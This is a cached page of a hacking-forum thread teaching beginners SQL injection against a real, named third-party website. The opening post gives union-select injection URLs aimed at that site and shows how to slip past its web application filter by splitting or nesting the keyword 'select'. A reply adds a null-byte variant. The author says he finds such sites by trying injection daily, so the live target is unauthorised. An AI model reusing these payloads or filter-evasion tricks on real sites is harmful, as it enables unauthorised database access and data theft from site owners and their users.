<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=2853082" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=2853082" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=2853082</a>. It is a snapshot of the page as it appeared on 10 Mar 2014 02:24:22 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=2853082" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:LMq3dQi8W6IJ:www.hackforums.net/showthread.php%3Ftid%3D2853082&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>SQLi tip for newbies - learn from error message - Page 1</title> <meta name="description" content="SQL Injection Attacks-SQLi tip for newbies - learn from error message"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=2853082"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-09-2014, 07:24 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">SQLi tip for newbies - learn from error message</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (3):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=2853082" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/rating.js"></script><div id="success_rating_2853082" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_2853082"><li style="width: 0%" class="current_rating" id="current_rating_2853082">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=2853082&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2853082&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2853082&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2853082&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2853082&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_2853082" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_2853082_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=2853082" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2853082&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_2853082");
// -->
</script><div><strong>SQLi tip for newbies - learn from error message</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid26312207" id="pid26312207"></a><table class="tborder" style="border-top-width: 0; " id="post_26312207" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-10-2012, 02:30 PM <span id="edited_by_26312207"><span class="smalltext">(This post was last modified: 09-10-2012 02:40 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=26312207#pid26312207">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img title="" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img title="" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img title="" src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,230<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">212</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26312207">This tip is related to this challenge<br><a href="http://www.hackforums.net/showthread.php?tid=2852529" target="_blank">http://www.hackforums.net/showthread.php?tid=2852529</a><br><br>We use this URL in that challenge<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=117</code></div></div><br>As this web page reports all error messages it is ideal for my tip about <span style="font-weight: bold;"><span style="color: #FFD700;">reading carefuly and learning from error message</span></span>.<br><br>We put this command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union select 1,2,3,4,version(),6,7,8,9--+</code></div></div><br><br>and we get this error message:<br><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/f79d150bae354d151813360a601b0878.png" alt="[Image: f79d150bae354d151813360a601b0878.png]" border="0"><br><br>If we compare our command with error message we can notice command <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span> was cut out by WAF (web application filter). It is missing in error report.<br><br>OK, now we try to mask command <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span> with antiWAF like <span style="font-weight: bold;"><span style="color: #00BFFF;">/*!select*/</span></span>. Our command will be:<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union /*!select*/ 1,2,3,4,version(),6,7,8,9--+</code></div></div><br>and we get this error response:<br><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/5fe6b5cf97820f156cfd9877ae998f06.png" alt="[Image: 5fe6b5cf97820f156cfd9877ae998f06.png]" border="0"><br><br>This time we can notice beside command <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span> also all characters <span style="font-weight: bold;"><span style="color: #FFD700;">*</span></span> are missing. All <span style="font-weight: bold;"><span style="color: #FFD700;">*</span></span> were cut out by WAF.<br><br>Now we will use some logic. If command <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span> is filtered out we will mask it so WAF will not detect it. And we will "attack" WAF with its own weapon. We will use character <span style="font-weight: bold;"><span style="color: #FFD700;">*</span></span><br><br><span style="font-weight: bold;"><span style="color: #32CD32;">Solution 1</span></span><br>We will put <span style="font-weight: bold;"><span style="color: #FFD700;">*</span></span> somewhere in the command <span style="color: #00BFFF;">select</span> like <span style="font-weight: bold;"><span style="color: #00BFFF;">sel</span></span><span style="font-weight: bold;"><span style="color: #FFD700;">*</span></span><span style="font-weight: bold;"><span style="color: #00BFFF;">ect</span></span><br><br>Now WAF as clever it is will cut out character <span style="font-weight: bold;"><span style="color: #FFD700;">*</span></span>. What remains? <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"> He, he command <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span>. We were smarter than WAF and we used its own weapon.<br><br><span style="font-weight: bold;"><span style="color: #32CD32;">Solution 2</span></span><br>We already know command <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span> is filtered out. In such case we can also simply use<br><br><span style="font-weight: bold;"><span style="color: #00BFFF;">SEL</span></span><span style="font-weight: bold;"><span style="color: #FFD700;">select</span></span><span style="font-weight: bold;"><span style="color: #00BFFF;">ECT</span></span><br><br>After WAF cuts out middle word <span style="font-weight: bold;"><span style="color: #FFD700;">select</span></span> what remains? <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"> <span style="font-weight: bold;"><span style="color: #00BFFF;">SELECT</span></span> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>So working solution can be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union sel*ect 1,2,3,4,version(),6,7,8,9--+</code></div></div><br>or<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union SELselectECT 1,2,3,4,version(),6,7,8,9--+</code></div></div><br>If we try to get table names from that site we will find out also some other commands beside <span style="font-weight: bold;"><span style="color: #00BFFF;">select</span></span> are filtered out by WAF. As we know now how to bypass it that is not problem any more <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>I
 use this site for this quick tip because we always don't have so much 
luck with error response so informative as in this case. <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_26312207"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=26312207" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26316684" id="pid26316684"></a><table class="tborder" style="margin-top: 5px; " id="post_26316684" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-10-2012, 02:48 PM <span id="edited_by_26316684"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=26316684#pid26316684">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=927890"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/canstock10023506.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=927890"><span class="group9">CyberSyringe</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Web Exploitation Novice<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 12<br>Posts: 287<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=927890"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26316684">Nice tutorial/tip.<br><br>Although I'm pretty seasoned with SQLi there's something new to learn everyday.<br><br>May I ask where you find these sites with these examples from?</div><div class="post_meta" id="post_meta_26316684"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=927890" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=26316684" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26316944" id="pid26316944"></a><table class="tborder" style="margin-top: 5px; " id="post_26316944" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-10-2012, 02:57 PM <span id="edited_by_26316944"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=26316944#pid26316944">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,230<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">212</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26316944"><blockquote><cite><span>(09-10-2012 02:48 PM)</span>friedtaco Wrote: <a href="http://www.hackforums.net/showthread.php?pid=26316684#pid26316684" class="quick_jump">►</a></cite>May I ask where you find these sites with these examples from?</blockquote><br>I find them trying SQLi every day. 99% SQLi using dorks isn't interesting (just regular injection by tutorials).<br><br>But when I find something more interesting (like this page was) I make a challenge so other can sharp their skills too <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_26316944"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=26316944" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26318241" id="pid26318241"></a><table class="tborder" style="margin-top: 5px; " id="post_26318241" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-10-2012, 03:40 PM <span id="edited_by_26318241"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=26318241#pid26318241">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=955127"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/HackForums12.jpg" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=955127"><span class="group0">Волк</span></a></span></strong> <a href="http://www.hackforums.net/online.php" title="Online"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_online.gif" alt="Online" border="0"></a><br><span class="smalltext">Road to $300 | $16.43/$300 |<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/void.jpg" alt="Void" title="Void"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 304<br>Posts: 6,528<br>Joined: Jul 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=955127"><strong class="reputation_positive">608</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/donator.png" alt="Emerald Donator" title="Emerald Donator"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26318241">This is a very nice tutorial!<br><br>Keep up the good work.</div><div class="post_meta" id="post_meta_26318241"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=955127" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2853082&amp;replyto=26318241" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26322118" id="pid26322118"></a><table class="tborder" style="margin-top: 5px; " id="post_26322118" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-10-2012, 06:06 PM <span id="edited_by_26322118"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2853082&amp;pid=26322118#pid26322118">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1406490"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/tumblr_liub5s_Gkby1qi06hno1_500_thumb.jpg" alt="" height="84" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1406490"><span class="group9">p0pc0rn</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">&lt;3 Zixem<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20learn%20from%20error%20message%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 33<br>Posts: 693<br>Joined: Jul 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1406490"><strong class="reputation_positive">45</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26322118"><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union sel%00ect 1,2,3,4,version(),6,7,8,9--+</code></div></div>this can work as well :)</div><div class="post_meta" 